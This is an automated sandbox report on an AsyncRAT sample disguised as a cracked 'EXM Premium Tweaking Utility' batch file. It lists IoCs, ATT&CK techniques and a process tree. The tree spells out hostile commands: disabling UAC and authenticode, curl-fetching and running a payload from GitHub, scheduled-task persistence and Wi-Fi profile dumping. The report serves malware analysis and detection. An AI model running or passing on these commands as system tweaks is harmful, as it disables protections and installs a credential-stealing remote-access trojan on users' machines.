asyncrat | 63577b4677fe321246f2b6991639c920b55d4991b8fcf5986787ea1cd55e3250

System Information Discovery

persistence privilege_escalation

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	msedge.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	EXMservice.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 5 IoCs

pid	Process
2148	EXMservice.exe
2096	msedge.exe
2552	svchost.exe
2196	msedge.exe
2164	msedge.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon = "C:\\Windows\\System32\\ctfmon.exe"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
2252	powershell.exe
3180	powershell.exe

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\1d9db3c2a73d8bdac24747a947fd4f64\Admin@GYHASOLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
54	pastebin.com
53	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
61	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x0007000000023cbc-344.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3208	cmd.exe
4252	netsh.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000e3c1c56297b3270b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000e3c1c5620000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900e3c1c562000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1de3c1c562000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000e3c1c56200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	reg.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings\DownloadMode = "0"	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
2092	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2096	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2252	powershell.exe
2252	powershell.exe
2124	powershell.exe
2124	powershell.exe
3180	powershell.exe
3180	powershell.exe
3180	powershell.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2096	msedge.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2552	svchost.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe
2096	msedge.exe

Suspicious use of AdjustPrivilegeToken 61 IoCs

description	pid	Process
Token: SeDebugPrivilege	2252	powershell.exe
Token: SeIncreaseQuotaPrivilege	4776	WMIC.exe
Token: SeSecurityPrivilege	4776	WMIC.exe
Token: SeTakeOwnershipPrivilege	4776	WMIC.exe
Token: SeLoadDriverPrivilege	4776	WMIC.exe
Token: SeSystemProfilePrivilege	4776	WMIC.exe
Token: SeSystemtimePrivilege	4776	WMIC.exe
Token: SeProfSingleProcessPrivilege	4776	WMIC.exe
Token: SeIncBasePriorityPrivilege	4776	WMIC.exe
Token: SeCreatePagefilePrivilege	4776	WMIC.exe
Token: SeBackupPrivilege	4776	WMIC.exe
Token: SeRestorePrivilege	4776	WMIC.exe
Token: SeShutdownPrivilege	4776	WMIC.exe
Token: SeDebugPrivilege	4776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4776	WMIC.exe
Token: SeRemoteShutdownPrivilege	4776	WMIC.exe
Token: SeUndockPrivilege	4776	WMIC.exe
Token: SeManageVolumePrivilege	4776	WMIC.exe
Token: 33	4776	WMIC.exe
Token: 34	4776	WMIC.exe
Token: 35	4776	WMIC.exe
Token: 36	4776	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4776	WMIC.exe
Token: SeSecurityPrivilege	4776	WMIC.exe
Token: SeTakeOwnershipPrivilege	4776	WMIC.exe
Token: SeLoadDriverPrivilege	4776	WMIC.exe
Token: SeSystemProfilePrivilege	4776	WMIC.exe
Token: SeSystemtimePrivilege	4776	WMIC.exe
Token: SeProfSingleProcessPrivilege	4776	WMIC.exe
Token: SeIncBasePriorityPrivilege	4776	WMIC.exe
Token: SeCreatePagefilePrivilege	4776	WMIC.exe
Token: SeBackupPrivilege	4776	WMIC.exe
Token: SeRestorePrivilege	4776	WMIC.exe
Token: SeShutdownPrivilege	4776	WMIC.exe
Token: SeDebugPrivilege	4776	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4776	WMIC.exe
Token: SeRemoteShutdownPrivilege	4776	WMIC.exe
Token: SeUndockPrivilege	4776	WMIC.exe
Token: SeManageVolumePrivilege	4776	WMIC.exe
Token: 33	4776	WMIC.exe
Token: 34	4776	WMIC.exe
Token: 35	4776	WMIC.exe
Token: 36	4776	WMIC.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeBackupPrivilege	3584	vssvc.exe
Token: SeRestorePrivilege	3584	vssvc.exe
Token: SeAuditPrivilege	3584	vssvc.exe
Token: SeDebugPrivilege	3180	powershell.exe
Token: SeDebugPrivilege	2096	msedge.exe
Token: SeBackupPrivilege	1040	srtasks.exe
Token: SeRestorePrivilege	1040	srtasks.exe
Token: SeSecurityPrivilege	1040	srtasks.exe
Token: SeTakeOwnershipPrivilege	1040	srtasks.exe
Token: SeDebugPrivilege	2552	svchost.exe
Token: SeBackupPrivilege	1040	srtasks.exe
Token: SeRestorePrivilege	1040	srtasks.exe
Token: SeSecurityPrivilege	1040	srtasks.exe
Token: SeTakeOwnershipPrivilege	1040	srtasks.exe
Token: SeDebugPrivilege	2096	msedge.exe
Token: SeDebugPrivilege	2196	msedge.exe
Token: SeDebugPrivilege	2164	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2096	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3652 wrote to memory of 2444	3652	cmd.exe	83
PID 3652 wrote to memory of 2444	3652	cmd.exe	83
PID 3652 wrote to memory of 1388	3652	cmd.exe	84
PID 3652 wrote to memory of 1388	3652	cmd.exe	84
PID 3652 wrote to memory of 4516	3652	cmd.exe	85
PID 3652 wrote to memory of 4516	3652	cmd.exe	85
PID 3652 wrote to memory of 2252	3652	cmd.exe	86
PID 3652 wrote to memory of 2252	3652	cmd.exe	86
PID 3652 wrote to memory of 2148	3652	cmd.exe	89
PID 3652 wrote to memory of 2148	3652	cmd.exe	89
PID 3652 wrote to memory of 4648	3652	cmd.exe	90
PID 3652 wrote to memory of 4648	3652	cmd.exe	90
PID 3652 wrote to memory of 964	3652	cmd.exe	91
PID 3652 wrote to memory of 964	3652	cmd.exe	91
PID 964 wrote to memory of 4776	964	cmd.exe	92
PID 964 wrote to memory of 4776	964	cmd.exe	92
PID 964 wrote to memory of 2912	964	cmd.exe	93
PID 964 wrote to memory of 2912	964	cmd.exe	93
PID 3652 wrote to memory of 2104	3652	cmd.exe	94
PID 3652 wrote to memory of 2104	3652	cmd.exe	94
PID 3652 wrote to memory of 3044	3652	cmd.exe	96
PID 3652 wrote to memory of 3044	3652	cmd.exe	96
PID 3652 wrote to memory of 2124	3652	cmd.exe	97
PID 3652 wrote to memory of 2124	3652	cmd.exe	97
PID 3652 wrote to memory of 3092	3652	cmd.exe	108
PID 3652 wrote to memory of 3092	3652	cmd.exe	108
PID 3652 wrote to memory of 4048	3652	cmd.exe	111
PID 3652 wrote to memory of 4048	3652	cmd.exe	111
PID 3652 wrote to memory of 3924	3652	cmd.exe	112
PID 3652 wrote to memory of 3924	3652	cmd.exe	112
PID 3652 wrote to memory of 3180	3652	cmd.exe	113
PID 3652 wrote to memory of 3180	3652	cmd.exe	113
PID 3652 wrote to memory of 2148	3652	cmd.exe	114
PID 3652 wrote to memory of 2148	3652	cmd.exe	114
PID 2148 wrote to memory of 2096	2148	EXMservice.exe	115
PID 2148 wrote to memory of 2096	2148	EXMservice.exe	115
PID 2148 wrote to memory of 2552	2148	EXMservice.exe	116
PID 2148 wrote to memory of 2552	2148	EXMservice.exe	116
PID 2148 wrote to memory of 2552	2148	EXMservice.exe	116
PID 3652 wrote to memory of 3152	3652	cmd.exe	117
PID 3652 wrote to memory of 3152	3652	cmd.exe	117
PID 2096 wrote to memory of 2092	2096	msedge.exe	119
PID 2096 wrote to memory of 2092	2096	msedge.exe	119
PID 2552 wrote to memory of 3208	2552	svchost.exe	122
PID 2552 wrote to memory of 3208	2552	svchost.exe	122
PID 2552 wrote to memory of 3208	2552	svchost.exe	122
PID 3208 wrote to memory of 4820	3208	cmd.exe	124
PID 3208 wrote to memory of 4820	3208	cmd.exe	124
PID 3208 wrote to memory of 4820	3208	cmd.exe	124
PID 3208 wrote to memory of 4252	3208	cmd.exe	125
PID 3208 wrote to memory of 4252	3208	cmd.exe	125
PID 3208 wrote to memory of 4252	3208	cmd.exe	125
PID 3208 wrote to memory of 2936	3208	cmd.exe	126
PID 3208 wrote to memory of 2936	3208	cmd.exe	126
PID 3208 wrote to memory of 2936	3208	cmd.exe	126
PID 2552 wrote to memory of 3576	2552	svchost.exe	127
PID 2552 wrote to memory of 3576	2552	svchost.exe	127
PID 2552 wrote to memory of 3576	2552	svchost.exe	127
PID 3576 wrote to memory of 3860	3576	cmd.exe	129
PID 3576 wrote to memory of 3860	3576	cmd.exe	129
PID 3576 wrote to memory of 3860	3576	cmd.exe	129
PID 3576 wrote to memory of 4444	3576	cmd.exe	130
PID 3576 wrote to memory of 4444	3576	cmd.exe	130
PID 3576 wrote to memory of 4444	3576	cmd.exe	130

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3652
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "RPSessionInterval" /f
  2⤵
  PID:2444
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\SystemRestore" /v "DisableConfig" /f
  2⤵
  PID:1388
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
  2⤵
  PID:4516
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2252
- C:\Windows\system32\reg.exe
  Reg.exe ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
  2⤵
  - UAC bypass
  PID:2148
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\CONSOLE" /v "VirtualTerminalLevel" /t REG_DWORD /d "1" /f
  2⤵
  PID:4648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic path Win32_UserAccount where name="Admin" get sid | findstr "S-"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic path Win32_UserAccount where name="Admin" get sid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4776
- - C:\Windows\system32\findstr.exe
    findstr "S-"
    3⤵
    PID:2912
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:2104
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:3044
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -ExecutionPolicy Bypass -Command "Checkpoint-Computer -Description 'Exm Premium Restore Point' -RestorePointType 'MODIFY_SETTINGS'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2124
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3092
- C:\Windows\system32\chcp.com
  chcp 437
  2⤵
  PID:4048
- C:\Windows\system32\curl.exe
  curl -g -k -L -# -o "C:\Users\Admin\AppData\Local\Temp\exm.zip" "https://github.com/anonyketa/EXM-Tweaking-Utility-Premium/releases/download/V1.0/exm.zip"
  2⤵
  PID:3924
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile Expand-Archive 'C:\Users\Admin\AppData\Local\Temp\exm.zip' -DestinationPath 'C:\Exm\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3180
- C:\exm\EXMservice.exe
  EXMservice.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2148
- - C:\Users\Admin\msedge.exe
    "C:\Users\Admin\msedge.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2096
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2092
- - C:\Users\Admin\svchost.exe
    "C:\Users\Admin\svchost.exe"
    3⤵
    - Executes dropped EXE
    - Drops desktop.ini file(s)
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2552
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:3208
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4820
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4252
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2936
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3576
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3860
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:4444
- C:\Windows\system32\chcp.com
  chcp 65001
  2⤵
  PID:3152
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Desktop" /v "AutoEndTasks" /t REG_SZ /d "1" /f
  2⤵
  PID:2272
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t REG_SZ /d "1000" /f
  2⤵
  PID:4876
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t REG_SZ /d "2000" /f
  2⤵
  PID:1528
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Desktop" /v "LowLevelHooksTimeout" /t REG_SZ /d "1000" /f
  2⤵
  PID:1976
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Desktop" /v "MenuShowDelay" /t REG_SZ /d "0" /f
  2⤵
  PID:2284
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t REG_SZ /d "2000" /f
  2⤵
  PID:4192
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Microsoft\FTH" /v "Enabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:2816
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineCore" /f
  2⤵
  PID:3796
- C:\Windows\system32\reg.exe
  Reg.exe delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MicrosoftEdgeUpdateTaskMachineUA" /f
  2⤵
  PID:1632
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "StartupBoostEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:2288
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Google\Chrome" /v "BackgroundModeEnabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:4024
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Windows\DWM" /v "UseDpiScaling" /t REG_DWORD /d "0" /f
  2⤵
  PID:1388
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Multimedia\Audio" /v "UserDuckingPreference" /t REG_DWORD /d "3" /f
  2⤵
  PID:3396
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\BootAnimation" /v "DisableStartupSound" /t REG_DWORD /d "1" /f
  2⤵
  PID:2728
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
  2⤵
  PID:2172
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
  2⤵
  PID:992
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
  2⤵
  PID:3364
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ctfmon" /t REG_SZ /d "C:\Windows\System32\ctfmon.exe" /f
  2⤵
  - Adds Run key to start application
  PID:440
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\VideoSettings" /v "VideoQualityOnBattery" /t REG_DWORD /d "1" /f
  2⤵
  PID:3492
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "IconsOnly" /t REG_DWORD /d "0" /f
  2⤵
  PID:4640
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewShadow" /t REG_DWORD /d "0" /f
  2⤵
  PID:4736
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
  2⤵
  PID:2504
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
  2⤵
  PID:3328
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowDeviceNameInTelemetry" /t REG_DWORD /d "0" /f
  2⤵
  PID:2164
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\safer\codeidentifiers" /v "authenticodeenabled" /t REG_DWORD /d "0" /f
  2⤵
  PID:3884
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
  2⤵
  PID:1556
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
  2⤵
  PID:3044
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Speech_OneCore\Settings\OnlineSpeechPrivacy" /v "HasAccepted" /t REG_DWORD /d "0" /f
  2⤵
  PID:4184
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
  2⤵
  PID:3000
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
  2⤵
  PID:2868
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4940
- C:\Windows\system32\reg.exe
  Reg.exe add "HKCU\SOFTWARE\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
  2⤵
  PID:2620
- C:\Windows\system32\reg.exe
  Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DataCollection" /v "AllowTelemetry" /t REG_DWORD /d "0" /f
  2⤵
